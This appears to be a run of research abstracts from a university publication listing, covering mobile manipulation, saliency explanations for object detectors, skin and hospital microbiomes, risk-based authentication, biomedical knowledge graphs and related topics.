Loading of shipping containers for dairy products often includes a press-fit task, which involves manually stacking milk cartons in a container without using pallets or packaging. Automating this task with a mobile manipulator can reduce worker strain, and also enhance the efficiency and safety of the container loading process. This paper proposes an approach called Adaptive Compliant Control with Integrated Failure Recovery (ACCIFR), which enables a mobile manipulator to reliably perform the press-fit task. We base the approach on a demonstration learning-based compliant control framework, such that we integrate a monitoring and failure recovery mechanism for successful task execution. Concretely, we monitor the execution through distance and force feedback, detect collisions while the robot is performing the press-fit task, and use wrench measurements to classify the direction of collision; this information informs the subsequent recovery process. We evaluate the method on a miniature container setup, considering variations in the (i) starting position of the end effector, (ii) goal configuration, and (iii) object grasping position. The results demonstrate that the proposed approach outperforms the baseline demonstration-based learning framework regarding adaptability to environmental variations and the ability to recover from collision failures, making it a promising solution for practical press-fit applications.
In the design of robot skills, the focus generally lies on increasing the flexibility and reliability of the robot execution process; however, typical skill representations are not designed for analysing execution failures if they occur or for explicitly learning from failures. In this paper, we describe a learning-based hybrid representation for skill parameterisation called an execution model, which considers execution failures to be a natural part of the execution process. We then (i) demonstrate how execution contexts can be included in execution models, (ii) introduce a technique for generalising models between object categories by combining generalisation attempts performed by a robot with knowledge about object similarities represented in an ontology, and (iii) describe a procedure that uses an execution model for identifying a likely hypothesis of a parameterisation failure. The feasibility of the proposed methods is evaluated in multiple experiments performed with a physical robot in the context of handle grasping, object grasping, and object pulling. The experimental results suggest that execution models contribute towards avoiding execution failures, but also represent a first step towards more introspective robots that are able to analyse some of their execution failures in an explicit manner.
Saliency methods are frequently used to explain Deep Neural Network-based models. Adebayo et al.'s work on evaluating saliency methods for classification models illustrate certain explanation methods fail the model and data randomization tests. However, on extending the tests for various state of the art object detectors we illustrate that the ability to explain a model is more dependent on the model itself than the explanation method. We perform sanity checks for object detection and define new qualitative criteria to evaluate the saliency explanations, both for object classification and bounding box decisions, using Guided Backpropagation, Integrated Gradients, and their Smoothgrad versions, together with Faster R-CNN, SSD, and EfficientDet-D0, trained on COCO. In addition, the sensitivity of the explanation method to model parameters and data labels varies class-wise motivating to perform the sanity checks for each class. We find that EfficientDet-D0 is the most interpretable method independent of the saliency method, which passes the sanity checks with little problems.
The representation, or encoding, utilized in evolutionary algorithms has a substantial effect on their performance. Examination of the suitability of widely used representations for quality diversity optimization (QD) in robotic domains has yielded inconsistent results regarding the most appropriate encoding method. Given the domain-dependent nature of QD, additional evidence from other domains is necessary. This study compares the impact of several representations, including direct encoding, a dictionary-based representation, parametric encoding, compositional pattern producing networks, and cellular automata, on the generation of voxelized meshes in an architecture setting. The results reveal that some indirect encodings outperform direct encodings and can generate more diverse solution sets, especially when considering full phenotypic diversity. The paper introduces a multi-encoding QD approach that incorporates all evaluated representations in the same archive. Species of encodings compete on the basis of phenotypic features, leading to an approach that demonstrates similar performance to the best single-encoding QD approach. This is noteworthy, as it does not always require the contribution of the best-performing single encoding.
The non-filarial and non-communicable disease podoconiosis affects around 4 million people and is characterized by severe leg lymphedema accompanied with painful intermittent acute inflammatory episodes, called acute dermatolymphangioadenitis (ADLA) attacks. Risk factors have been associated with the disease but the mechanisms of pathophysiology remain uncertain. Lymphedema can lead to skin lesions, which can serve as entry points for bacteria that may cause ADLA attacks leading to progression of the lymphedema. However, the microbiome of the skin of affected legs from podoconiosis individuals remains unclear. Thus, we analysed the skin microbiome of podoconiosis legs using next generation sequencing. We revealed a positive correlation between increasing lymphedema severity and non-commensal anaerobic bacteria, especially Anaerococcus provencensis, as well as a negative correlation with the presence of Corynebacterium, a constituent of normal skin flora. Disease symptoms were generally linked to higher microbial diversity and richness, which deviated from the normal composition of the skin. These findings show an association of distinct bacterial taxa with lymphedema stages, highlighting the important role of bacteria for the pathogenesis of podoconiosis and might enable a selection of better treatment regimens to manage ADLA attacks and disease progression.
In the project EILD.nrw, Open Educational Resources (OER) have been developed for teaching databases. Lecturers can use the tools and courses in a variety of learning scenarios. Students of computer science and application subjects can learn the complete life cycle of databases. For this purpose, quizzes, interactive tools, instructional videos, and courses for learning management systems are developed and published under a Creative Commons license. We give an overview of the developed OERs according to subject, description, teaching form, and format. Following, we describe how licencing, sustainability, accessibility, contextualization, content description, and technical adaptability are implemented. The feedback of students in ongoing classes are evaluated.
The perceptual upright results from the multisensory integration of the directions indicated by vision and gravity as well as a prior assumption that upright is towards the head. The direction of gravity is signalled by multiple cues, the predominant of which are the otoliths of the vestibular system and somatosensory information from contact with the support surface. Here, we used neutral buoyancy to remove somatosensory information while retaining vestibular cues, thus "splitting the gravity vector" leaving only the vestibular component. In this way, neutral buoyancy can be used as a microgravity analogue. We assessed spatial orientation using the oriented character recognition test (OChaRT, which yields the perceptual upright, PU) under both neutrally buoyant and terrestrial conditions. The effect of visual cues to upright (the visual effect) was reduced under neutral buoyancy compared to on land but the influence of gravity was unaffected. We found no significant change in the relative weighting of vision, gravity, or body cues, in contrast to results found both in long-duration microgravity and during head-down bed rest. These results indicate a relatively minor role for somatosensation in determining the perceptual upright in the presence of vestibular cues. Short-duration neutral buoyancy is a weak analogue for microgravity exposure in terms of its perceptual consequences compared to long-duration head-down bed rest.
Indoor spaces exhibit microbial compositions that are distinctly dissimilar from one another and from outdoor spaces. Unique in this regard, and a topic that has only recently come into focus, is the microbiome of hospitals. While the benefits of knowing exactly which microorganisms propagate how and where in hospitals are undoubtedly beneficial for preventing hospital-acquired infections, there are, to date, no standardized procedures on how to best study the hospital microbiome. Our study aimed to investigate the microbiome of hospital sanitary facilities, outlining the extent to which hospital microbiome analyses differ according to sample-preparation protocol. For this purpose, fifty samples were collected from two separate hospitals—from three wards and one hospital laboratory—using two different storage media from which DNA was extracted using two different extraction kits and sequenced with two different primer pairs (V1–V2 and V3–V4). There were no observable differences between the sample-preservation media, small differences in detected taxa between the DNA extraction kits (mainly concerning Propionibacteriaceae), and large differences in detected taxa between the two primer pairs V1–V2 and V3–V4. This analysis also showed that microbial occurrences and compositions can vary greatly from toilets to sinks to showers and across wards and hospitals. In surgical wards, patient toilets appeared to be characterized by lower species richness and diversity than staff toilets. Which sampling sites are the best for which assessments should be analyzed in more depth. The fact that the sample processing methods we investigated (apart from the choice of primers) seem to have changed the results only slightly suggests that comparing hospital microbiome studies is a realistic option. The observed differences in species richness and diversity between patient and staff toilets should be further investigated, as these, if confirmed, could be a result of excreted antimicrobials.
Microbiome analyses are essential for understanding microorganism composition and diversity, but interpretation is often challenging due to biological and technical variables. DNA extraction is a critical step that can significantly bias results, particularly in samples containing a high abundance of challenging-to-lyse microorganisms. Taking into consideration the distinctive microenvironments observed in different bodily locations, our study sought to assess the extent of bias introduced by suboptimal bead-beating during DNA extraction across diverse clinical sample types. The question was whether complex targeted extraction methods are always necessary for reliable taxonomic abundance estimation through amplicon sequencing or if simpler alternatives are effective for some sample types. Hence, for four different clinical sample types (stool, cervical swab, skin swab, and hospital surface swab samples), we compared the results achieved from extracting targeted manual protocols routinely used in our research lab for each sample type with automated protocols specifically not designed for that purpose. Unsurprisingly, we found that for the stool samples, manual extraction protocols with vigorous bead-beating were necessary in order to avoid erroneous taxa proportions on all investigated taxonomic levels and, in particular, false under- or overrepresentation of important genera such as Blautia, Faecalibacterium, and Parabacteroides. However, interestingly, we found that the skin and cervical swab samples had similar results with all tested protocols. Our results suggest that the level of practical automation largely depends on the expected microenvironment, with skin and cervical swabs being much easier to process than stool samples. Prudent consideration is necessary when extending the conclusions of this study to applications beyond rough estimations of taxonomic abundance.
PURPOSE
Cervical cancer (CC) is caused by a persistent high-risk human papillomavirus (hrHPV) infection. The cervico-vaginal microbiome may influence the development of (pre)cancer lesions. Aim of the study was (i) to evaluate the new CC screening program in Germany for the detection of high-grade CC precursor lesions, and (ii) to elucidate the role of the cervico-vaginal microbiome and its potential impact on cervical dysplasia.
METHODS
The microbiome of 310 patients referred to colposcopy was determined by amplicon sequencing and correlated with clinicopathological parameters.
RESULTS
Most patients were referred for colposcopy due to a positive hrHPV result in two consecutive years combined with a normal PAP smear. In 2.1% of these cases, a CIN III lesion was detected. There was a significant positive association between the PAP stage and Lactobacillus vaginalis colonization and between the severity of CC precursor lesions and Ureaplasma parvum.
CONCLUSION
In our cohort, the new cervical cancer screening program resulted in a low rate of additional CIN III detected. It is questionable whether these cases were only identified earlier with additional HPV testing before the appearance of cytological abnormalities, or the new screening program will truly increase the detection rate of CIN III in the long run. Colonization with U. parvum was associated with histological dysplastic lesions. Whether targeted therapy of this pathogen or optimization of the microbiome prevents dysplasia remains speculative.
This research investigates the efficacy of multisensory cues for locating targets in Augmented Reality (AR). Sensory constraints can impair perception and attention in AR, leading to reduced performance due to factors such as conflicting visual cues or a restricted field of view. To address these limitations, the research proposes head-based multisensory guidance methods that leverage audio-tactile cues to direct users' attention towards target locations. The research findings demonstrate that this approach can effectively reduce the influence of sensory constraints, resulting in improved search performance in AR. Additionally, the thesis discusses the limitations of the proposed methods and provides recommendations for future research.
Digital ecosystems are driving the digital transformation of business models. Meanwhile, the associated processing of personal data within these complex systems poses challenges to the protection of individual privacy. In this paper, we explore these challenges from the perspective of digital ecosystems' platform providers. To this end, we present the results of an interview study with seven data protection officers representing a total of 12 digital ecosystems in Germany. We identified current and future challenges for the implementation of data protection requirements, covering issues on legal obligations and data subject rights. Our results support stakeholders involved in the implementation of privacy protection measures in digital ecosystems, and form the foundation for future privacy-related studies tailored to the specifics of digital ecosystems.
A company's financial documents use tables along with text to organize the data containing key performance indicators (KPIs) (such as profit and loss) and a financial quantity linked to them. The KPI’s linked quantity in a table might not be equal to the similarly described KPI's quantity in a text. Auditors take substantial time to manually audit these financial mistakes and this process is called consistency checking. As compared to existing work, this paper attempts to automate this task with the help of transformer-based models. Furthermore, for consistency checking it is essential for the table's KPIs embeddings to encode the semantic knowledge of the KPIs and the structural knowledge of the table. Therefore, this paper proposes a pipeline that uses a tabular model to get the table's KPIs embeddings. The pipeline takes input table and text KPIs, generates their embeddings, and then checks whether these KPIs are identical. The pipeline is evaluated on the financial documents in the German language and a comparative analysis of the cell embeddings' quality from the three tabular models is also presented. From the evaluation results, the experiment that used the English-translated text and table KPIs and Tabbie model to generate table KPIs’ embeddings achieved an accuracy of 72.81% on the consistency checking task, outperforming the benchmark, and other tabular models.
Quality diversity algorithms can be used to efficiently create a diverse set of solutions to inform engineers' intuition. But quality diversity is not efficient in very expensive problems, needing 100.000s of evaluations. Even with the assistance of surrogate models, quality diversity needs 100s or even 1000s of evaluations, which can make it use infeasible. In this study we try to tackle this problem by using a pre-optimization strategy on a lower-dimensional optimization problem and then map the solutions to a higher-dimensional case. For a use case to design buildings that minimize wind nuisance, we show that we can predict flow features around 3D buildings from 2D flow features around building footprints. For a diverse set of building designs, by sampling the space of 2D footprints with a quality diversity algorithm, a predictive model can be trained that is more accurate than when trained on a set of footprints that were selected with a space-filling algorithm like the Sobol sequence. Simulating only 16 buildings in 3D, a set of 1024 building designs with low predicted wind nuisance is created. We show that we can produce better machine learning models by producing training data with quality diversity instead of using common sampling techniques. The method can bootstrap generative design in a computationally expensive 3D domain and allow engineers to sweep the design space, understanding wind nuisance in early design phases.
Risk-based authentication (RBA) aims to protect users against attacks involving stolen passwords. RBA monitors features during login, and requests re-authentication when feature values widely differ from those previously observed. It is recommended by various national security organizations, and users perceive it more usable than and equally secure to equivalent two-factor authentication. Despite that, RBA is still used by very few online services. Reasons for this include a lack of validated open resources on RBA properties, implementation, and configuration. This effectively hinders the RBA research, development, and adoption progress.
To close this gap, we provide the first long-term RBA analysis on a real-world large-scale online service. We collected feature data of 3.3 million users and 31.3 million login attempts over more than 1 year. Based on the data, we provide (i) studies on RBA’s real-world characteristics plus its configurations and enhancements to balance usability, security, and privacy; (ii) a machine learning–based RBA parameter optimization method to support administrators finding an optimal configuration for their own use case scenario; (iii) an evaluation of the round-trip time feature’s potential to replace the IP address for enhanced user privacy; and (iv) a synthesized RBA dataset to reproduce this research and to foster future RBA research. Our results provide insights on selecting an optimized RBA configuration so that users profit from RBA after just a few logins. The open dataset enables researchers to study, test, and improve RBA for widespread deployment in the wild.
Risk-Based Authentication for OpenStack: A Fully Functional Implementation and Guiding Example
(2023)
Online services have difficulties to replace passwords with more secure user authentication mechanisms, such as Two-Factor Authentication (2FA). This is partly due to the fact that users tend to reject such mechanisms in use cases outside of online banking. Relying on password authentication alone, however, is not an option in light of recent attack patterns such as credential stuffing.
Risk-Based Authentication (RBA) can serve as an interim solution to increase password-based account security until better methods are in place. Unfortunately, RBA is currently used by only a few major online services, even though it is recommended by various standards and has been shown to be effective in scientific studies. This paper contributes to the hypothesis that the low adoption of RBA in practice can be due to the complexity of implementing it. We provide an RBA implementation for the open source cloud management software OpenStack, which is the first fully functional open source RBA implementation based on the Freeman et al. algorithm, along with initial reference tests that can serve as a guiding example and blueprint for developers.
This paper presents the b-it-bots RoboCup@Work team and its current hardware and functional architecture for the KUKA youBot robot. We describe the underlying software framework and the developed capabilities required for operating in industrial environments including features such as reliable and precise navigation, flexible manipulation, robust object recognition and task planning. New developments include an approach to grasp vertical objects, placement of objects by considering the empty space on a workstation, and the process of porting our code to ROS2.
Users should always play a central role in the development of (software) solutions. The human-centered design (HCD) process in the ISO 9241-210 standard proposes a procedure for systematically involving users. However, due to its abstraction level, the HCD process provides little guidance for how it should be implemented in practice. In this chapter, we propose three concrete practical methods that enable the reader to develop usable security and privacy (USP) solutions using the HCD process. This chapter equips the reader with the procedural knowledge and recommendations to: (1) derive mental models with regard to security and privacy, (2) analyze USP needs and privacy-related requirements, and (3) collect user characteristics on privacy and structure them by user group profiles and into privacy personas. Together, these approaches help to design measures for a user-friendly implementation of security and privacy measures based on a firm understanding of the key stakeholders.
The European General Data Protection Regulation requires the implementation of Technical and Organizational Measures (TOMs) to reduce the risk of illegitimate processing of personal data. For these measures to be effective, they must be applied correctly by employees who process personal data under the authority of their organization. However, even data processing employees often have limited knowledge of data protection policies and regulations, which increases the likelihood of misconduct and privacy breaches. To lower the likelihood of unintentional privacy breaches, TOMs must be developed with employees’ needs, capabilities, and usability requirements in mind. To reduce implementation costs and help organizations and IT engineers with the implementation, privacy patterns have proven to be effective for this purpose. In this chapter, we introduce the privacy pattern Data Cart, which specifically helps to develop TOMs for data processing employees. Based on a user-centered design approach with employees from two public organizations in Germany, we present a concept that illustrates how Privacy by Design can be effectively implemented. Organizations, IT engineers, and researchers will gain insight on how to improve the usability of privacy-compliant tools for managing personal data.
TSEM: Temporally-Weighted Spatiotemporal Explainable Neural Network for Multivariate Time Series
(2023)
Forensic DNA profiles are established by multiplex PCR amplification of a set of highly variable short tandem repeat (STR) loci followed by capillary electrophoresis (CE) as a means to assign alleles to PCR products of differential length. Recently, CE analysis of STR amplicons has been supplemented by high-throughput next generation sequencing (NGS) techniques that are able to detect isoalleles bearing sequence polymorphisms and allow for an improved analysis of degraded DNA. Several such assays have been commercialised and validated for forensic applications. However, these systems are cost-effective only when applied to high numbers of samples. We report here an alternative, cost-efficient shallow-sequence output NGS assay called maSTR assay that, in conjunction with a dedicated bioinformatics pipeline called SNiPSTR, can be implemented with standard NGS instrumentation. In a back-to-back comparison with a CE-based, commercial forensic STR kit, we find that for samples with low DNA content, with mixed DNA from different individuals, or containing PCR inhibitors, the maSTR assay performs equally well, and with degraded DNA is superior to CE-based analysis. Thus, the maSTR assay is a simple, robust and cost-efficient NGS-based STR typing method applicable for human identification in forensic and biomedical contexts.
Risikobasierte Authentifizierung (RBA) ist ein adaptiver Ansatz zur Stärkung der Passwortauthentifizierung. Er überwacht eine Reihe von Merkmalen, die sich auf das Loginverhalten während der Passworteingabe beziehen. Wenn sich die beobachteten Merkmalswerte signifikant von denen früherer Logins unterscheiden, fordert RBA zusätzliche Identitätsnachweise an. Regierungsbehörden und ein Erlass des US-Präsidenten empfehlen RBA, um Onlineaccounts vor Angriffen mit gestohlenen Passwörtern zu schützen. Trotz dieser Tatsachen litt RBA unter einem Mangel an offenem Wissen. Es gab nur wenige bis keine Untersuchungen über die Usability, Sicherheit und Privatsphäre von RBA. Das Verständnis dieser Aspekte ist jedoch wichtig für eine breite Akzeptanz.
Diese Arbeit soll ein umfassendes Verständnis von RBA mit einer Reihe von Studien vermitteln. Die Ergebnisse ermöglichen es, datenschutzfreundliche RBA-Lösungen zu schaffen, die die Authentifizierung stärken bei gleichzeitig hoher Menschenakzeptanz.
Question Answering (QA) has gained significant attention in recent years, with transformer-based models improving natural language processing. However, issues of explainability remain, as it is difficult to determine whether an answer is based on a true fact or a hallucination. Knowledge-based question answering (KBQA) methods can address this problem by retrieving answers from a knowledge graph. This paper proposes a hybrid approach to KBQA called FRED, which combines pattern-based entity retrieval with a transformer-based question encoder. The method uses an evolutionary approach to learn SPARQL patterns, which retrieve candidate entities from a knowledge base. The transformer-based regressor is then trained to estimate each pattern’s expected F1 score for answering the question, resulting in a ranking ofcandidate entities. Unlike other approaches, FRED can attribute results to learned SPARQL patterns, making them more interpretable. The method is evaluated on two datasets and yields MAP scores of up to 73 percent, with the transformer-based interpretation falling only 4 pp short of an oracle run. Additionally, the learned patterns successfully complement manually generated ones and generalize well to novel questions.
This paper addresses the classification of Arabic text data in the field of Natural Language Processing (NLP), with a particular focus on Natural Language Inference (NLI) and Contradiction Detection (CD). Arabic is considered a resource-poor language, meaning that there are few data sets available, which leads to limited availability of NLP methods. To overcome this limitation, we create a dedicated data set from publicly available resources. Subsequently, transformer-based machine learning models are being trained and evaluated. We find that a language-specific model (AraBERT) performs competitively with state-of-the-art multilingual approaches, when we apply linguistically informed pre-training methods such as Named Entity Recognition (NER). To our knowledge, this is the first large-scale evaluation for this task in Arabic, as well as the first application of multi-task pre-training in this context.
Airborne and spaceborne platforms are the primary data sources for large-scale forest mapping, but visual interpretation for individual species determination is labor-intensive. Hence, various studies focusing on forests have investigated the benefits of multiple sensors for automated tree species classification. However, transferable deep learning approaches for large-scale applications are still lacking. This gap motivated us to create a novel dataset for tree species classification in central Europe based on multi-sensor data from aerial, Sentinel-1 and Sentinel-2 imagery. In this paper, we introduce the TreeSatAI Benchmark Archive, which contains labels of 20 European tree species (i.e., 15 tree genera) derived from forest administration data of the federal state of Lower Saxony, Germany. We propose models and guidelines for the application of the latest machine learning techniques for the task of tree species classification with multi-label data. Finally, we provide various benchmark experiments showcasing the information which can be derived from the different sensors including artificial neural networks and tree-based machine learning methods. We found that residual neural networks (ResNet) perform sufficiently well with weighted precision scores up to 79 % only by using the RGB bands of aerial imagery. This result indicates that the spatial content present within the 0.2 m resolution data is very informative for tree species classification. With the incorporation of Sentinel-1 and Sentinel-2 imagery, performance improved marginally. However, the sole use of Sentinel-2 still allows for weighted precision scores of up to 74 % using either multi-layer perceptron (MLP) or Light Gradient Boosting Machine (LightGBM) models. Since the dataset is derived from real-world reference data, it contains high class imbalances. We found that this dataset attribute negatively affects the models' performances for many of the underrepresented classes (i.e., scarce tree species). However, the class-wise precision of the best-performing late fusion model still reached values ranging from 54 % (Acer) to 88 % (Pinus). Based on our results, we conclude that deep learning techniques using aerial imagery could considerably support forestry administration in the provision of large-scale tree species maps at a very high resolution to plan for challenges driven by global environmental change. The original dataset used in this paper is shared via Zenodo (https://doi.org/10.5281/zenodo.6598390, Schulz et al., 2022). For citation of the dataset, we refer to this article.
LiDAR-based Indoor Localization with Optimal Particle Filters using Surface Normal Constraints
(2023)
Intelligent virtual agents provide a framework for simulating more life-like behavior and increasing plausibility in virtual training environments. They can improve the learning process if they portray believable behavior that can also be controlled to support the training objectives. In the context of this thesis, cognitive agents are considered a subset of intelligent virtual agents (IVA) with the focus on emulating cognitive processes to achieve believable behavior. The complexity of employed algorithms, however, is often limited since multiple agents need to be simulated in real-time. Available solutions focus on a subset of the indicated aspects: plausibility, controllability, or real-time capability (scalability). Within this thesis project, an agent architecture for attentive cognitive agents is developed that considers all three aspects at once. The result is a lightweight cognitive agent architecture that is customizable to application-specific requirements. A generic trait-based personality model influences all cognitive processes, facilitating the generation of consistent and individual behavior. An additional mapping process provides a formalized mechanism to transfer results of psychological studies to the architecture. Personality profiles are combined with an emotion model to achieve situational behavior adaptation. Which action an agent selects in a situation also influences plausibility. An integral element of this selection process is an agent's knowledge about its world. Therefore, synthetic perception is modeled and integrated into the architecture to provide a credible knowledge base. The developed perception module includes a unified sensor interface, a memory hierarchy, and an attention process. With the presented realization of the architecture (CAARVE), it is possible for the first time to simulate cognitive agents, whose behaviors are simultaneously computable in real-time and controllable. The architecture's applicability is demonstrated by integrating an agent-based traffic simulation built with CAARVE into a bicycle simulator for road-safety education. The developed ideas and their realization are evaluated within this work using different strategies and scenarios. For example, it is shown how CAARVE agents utilize personality profiles and emotions to plausibly resolve deadlocks in traffic simulations. Controllability and adaptability are demonstrated in additional scenarios. Using the realization, 200 agents can be simulated in real-time (50 FPS), illustrating scalability. The achieved results verify that the developed architecture can generate plausible and controllable agent behavior in real-time. The presented concepts and realizations provide sound fundamentals to everyone interested in simulating IVA in real-time environments.
Self-supervised learning has proved to be a powerful approach to learn image representations without the need of large labeled datasets. For underwater robotics, it is of great interest to design computer vision algorithms to improve perception capabilities such as sonar image classification. Due to the confidential nature of sonar imaging and the difficulty to interpret sonar images, it is challenging to create public large labeled sonar datasets to train supervised learning algorithms. In this work, we investigate the potential of three self-supervised learning methods (RotNet, Denoising Autoencoders, and Jigsaw) to learn high-quality sonar image representation without the need of human labels. We present pre-training and transfer learning results on real-life sonar image datasets. Our results indicate that self-supervised pre-training yields classification performance comparable to supervised pre-training in a few-shot transfer learning setup across all three methods. Code and self-supervised pre-trained models are be available at https://github.com/agrija9/ssl-sonar-images
We introduce canonical weight normalization for convolutional neural networks. Inspired by the canonical tensor decomposition, we express the weight tensors in so-called canonical networks as scaled sums of outer vector products. In particular, we train network weights in the decomposed form, where scale weights are optimized separately for each mode. Additionally, similarly to weight normalization, we include a global scaling parameter. We study the initialization of the canonical form by running the power method and by drawing randomly from Gaussian or uniform distributions. Our results indicate that we can replace the power method with cheaper initializations drawn from standard distributions. The canonical re-parametrization leads to competitive normalization performance on the MNIST, CIFAR10, and SVHN data sets. Moreover, the formulation simplifies network compression. Once training has converged, the canonical form allows convenient model-compression by truncating the parameter sums.
Vietnam requires a sustainable urbanization, for which city sensing is used in planning and de-cision-making. Large cities need portable, scalable, and inexpensive digital technology for this purpose. End-to-end air quality monitoring companies such as AirVisual and Plume Air have shown their reliability with portable devices outfitted with superior air sensors. They are pricey, yet homeowners use them to get local air data without evaluating the causal effect. Our air quality inspection system is scalable, reasonably priced, and flexible. Minicomputer of the sys-tem remotely monitors PMS7003 and BME280 sensor data through a microcontroller processor. The 5-megapixel camera module enables researchers to infer the causal relationship between traffic intensity and dust concentration. The design enables inexpensive, commercial-grade hardware, with Azure Blob storing air pollution data and surrounding-area imagery and pre-venting the system from physically expanding. In addition, by including an air channel that re-plenishes and distributes temperature, the design improves ventilation and safeguards electrical components. The gadget allows for the analysis of the correlation between traffic and air quali-ty data, which might aid in the establishment of sustainable urban development plans and poli-cies.
Comparative study of 3D object detection frameworks based on LiDAR data and sensor fusion techniques
(2022)
Estimating and understanding the surroundings of the vehicle precisely forms the basic and crucial step for the autonomous vehicle. The perception system plays a significant role in providing an accurate interpretation of a vehicle's environment in real-time. Generally, the perception system involves various subsystems such as localization, obstacle (static and dynamic) detection, and avoidance, mapping systems, and others. For perceiving the environment, these vehicles will be equipped with various exteroceptive (both passive and active) sensors in particular cameras, Radars, LiDARs, and others. These systems are equipped with deep learning techniques that transform the huge amount of data from the sensors into semantic information on which the object detection and localization tasks are performed. For numerous driving tasks, to provide accurate results, the location and depth information of a particular object is necessary. 3D object detection methods, by utilizing the additional pose data from the sensors such as LiDARs, stereo cameras, provides information on the size and location of the object. Based on recent research, 3D object detection frameworks performing object detection and localization on LiDAR data and sensor fusion techniques show significant improvement in their performance. In this work, a comparative study of the effect of using LiDAR data for object detection frameworks and the performance improvement seen by using sensor fusion techniques are performed. Along with discussing various state-of-the-art methods in both the cases, performing experimental analysis, and providing future research directions.
Recent advances in Natural Language Processing have substantially improved contextualized representations of language. However, the inclusion of factual knowledge, particularly in the biomedical domain, remains challenging. Hence, many Language Models (LMs) are extended by Knowledge Graphs (KGs), but most approaches require entity linking (i.e., explicit alignment between text and KG entities). Inspired by single-stream multimodal Transformers operating on text, image and video data, this thesis proposes the Sophisticated Transformer trained on biomedical text and Knowledge Graphs (STonKGs). STonKGs incorporates a novel multimodal architecture based on a cross encoder that uses the attention mechanism on a concatenation of input sequences derived from text and KG triples, respectively. Over 13 million so-called text-triple pairs, coming from PubMed and assembled using the Integrated Network and Dynamical Reasoning Assembler (INDRA), were used in an unsupervised pre-training procedure to learn representations of biomedical knowledge in STonKGs. By comparing STonKGs to an NLP- and a KG-baseline (operating on either text or KG data) on a benchmark consisting of eight fine-tuning tasks, the proposed knowledge integration method applied in STonKGs was empirically validated. Specifically, on tasks with a comparatively small dataset size and a larger number of classes, STonKGs resulted in considerable performance gains, beating the F1-score of the best baseline by up to 0.083. Both the source code as well as the code used to implement STonKGs are made publicly available so that the proposed method of this thesis can be extended to many other biomedical applications.
Contextual information is widely considered for NLP and knowledge discovery in life sciences since it highly influences the exact meaning of natural language. The scientific challenge is not only to extract such context data, but also to store this data for further query and discovery approaches. Classical approaches use RDF triple stores, which have serious limitations. Here, we propose a multiple step knowledge graph approach using labeled property graphs based on polyglot persistence systems to utilize context data for context mining, graph queries, knowledge discovery and extraction. We introduce the graph-theoretic foundation for a general context concept within semantic networks and show a proof of concept based on biomedical literature and text mining. Our test system contains a knowledge graph derived from the entirety of PubMed and SCAIView data and is enriched with text mining data and domain-specific language data using Biological Expression Language. Here, context is a more general concept than annotations. This dense graph has more than 71M nodes and 850M relationships. We discuss the impact of this novel approach with 27 real-world use cases represented by graph queries. Storing and querying a giant knowledge graph as a labeled property graph is still a technological challenge. Here, we demonstrate how our data model is able to support the understanding and interpretation of biomedical data. We present several real-world use cases that utilize our massive, generated knowledge graph derived from PubMed data and enriched with additional contextual data. Finally, we show a working example in context of biologically relevant information using SCAIView.
State-of-the-art object detectors are treated as black boxes due to their highly non-linear internal computations. Even with unprecedented advancements in detector performance, the inability to explain how their outputs are generated limits their use in safety-critical applications. Previous work fails to produce explanations for both bounding box and classification decisions, and generally make individual explanations for various detectors. In this paper, we propose an open-source Detector Explanation Toolkit (DExT) which implements the proposed approach to generate a holistic explanation for all detector decisions using certain gradient-based explanation methods. We suggests various multi-object visualization methods to merge the explanations of multiple objects detected in an image as well as the corresponding detections in a single image. The quantitative evaluation show that the Single Shot MultiBox Detector (SSD) is more faithfully explained compared to other detectors regardless of the explanation methods. Both quantitative and human-centric evaluations identify that SmoothGrad with Guided Backpropagation (GBP) provides more trustworthy explanations among selected methods across all detectors. We expect that DExT will motivate practitioners to evaluate object detectors from the interpretability perspective by explaining both bounding box and classification decisions.
21 pages, with supplementary
ProtSTonKGs: A Sophisticated Transformer Trained on Protein Sequences, Text, and Knowledge Graphs
(2022)
While most approaches individually exploit unstructured data from the biomedical literature or structured data from biomedical knowledge graphs, their union can better exploit the advantages of such approaches, ultimately improving representations of biology. Using multimodal transformers for such purposes can improve performance on context dependent classication tasks, as demonstrated by our previous model, the Sophisticated Transformer Trained on Biomedical Text and Knowledge Graphs (STonKGs). In this work, we introduce ProtSTonKGs, a transformer aimed at learning all-encompassing representations of protein-protein interactions. ProtSTonKGs presents an extension to our previous work by adding textual protein descriptions and amino acid sequences (i.e., structural information) to the text- and knowledge graph-based input sequence used in STonKGs. We benchmark ProtSTonKGs against STonKGs, resulting in improved F1 scores by up to 0.066 (i.e., from 0.204 to 0.270) in several tasks such as predicting protein interactions in several contexts. Our work demonstrates how multimodal transformers can be used to integrate heterogeneous sources of information, paving the foundation for future approaches that use multiple modalities for biomedical applications.
Effective Neighborhood Feature Exploitation in Graph CNNs for Point Cloud Object-Part Segmentation
(2022)
Part segmentation is the task of semantic segmentation applied on objects and carries a wide range of applications from robotic manipulation to medical imaging. This work deals with the problem of part segmentation on raw, unordered point clouds of 3D objects. While pioneering works on deep learning for point clouds typically ignore taking advantage of local geometric structure around individual points, the subsequent methods proposed to extract features by exploiting local geometry have not yielded significant improvements either. In order to investigate further, a graph convolutional network (GCN) is used in this work in an attempt to increase the effectiveness of such neighborhood feature exploitation approaches. Most of the previous works also focus only on segmenting complete point cloud data. Considering the impracticality of such approaches, taking into consideration the real world scenarios where complete point clouds are scarcely available, this work proposes approaches to deal with partial point cloud segmentation.
In the attempt to better capture neighborhood features, this work proposes a novel method to learn regional part descriptors which guide and refine the segmentation predictions. The proposed approach helps the network achieve state-of-the-art performance of 86.4% mIoU on the ShapeNetPart dataset for methods which do not use any preprocessing techniques or voting strategies. In order to better deal with partial point clouds, this work also proposes new strategies to train and test on partial data. While achieving significant improvements compared to the baseline performance, the problem of partial point cloud segmentation is also viewed through an alternate lens of semantic shape completion.
Semantic shape completion networks not only help deal with partial point cloud segmentation but also enrich the information captured by the system by predicting complete point clouds with corresponding semantic labels for each point. To this end, a new network architecture for semantic shape completion is also proposed based on point completion network (PCN) which takes advantage of a graph convolution based hierarchical decoder for completion as well as segmentation. In addition to predicting complete point clouds, results indicate that the network is capable of reaching within a margin of 5% to the mIoU performance of dedicated segmentation networks for partial point cloud segmentation.
As cameras are ubiquitous in autonomous systems, object detection is a crucial task. Object detectors are widely used in applications such as autonomous driving, healthcare, and robotics. Given an image, an object detector outputs both the bounding box coordinates as well as classification probabilities for each object detected. The state-of-the-art detectors are treated as black boxes due to their highly non-linear internal computations. Even with unprecedented advancements in detector performance, the inability to explain how their outputs are generated limits their use in safety-critical applications in particular. It is therefore crucial to explain the reason behind each detector decision in order to gain user trust, enhance detector performance, and analyze their failure.
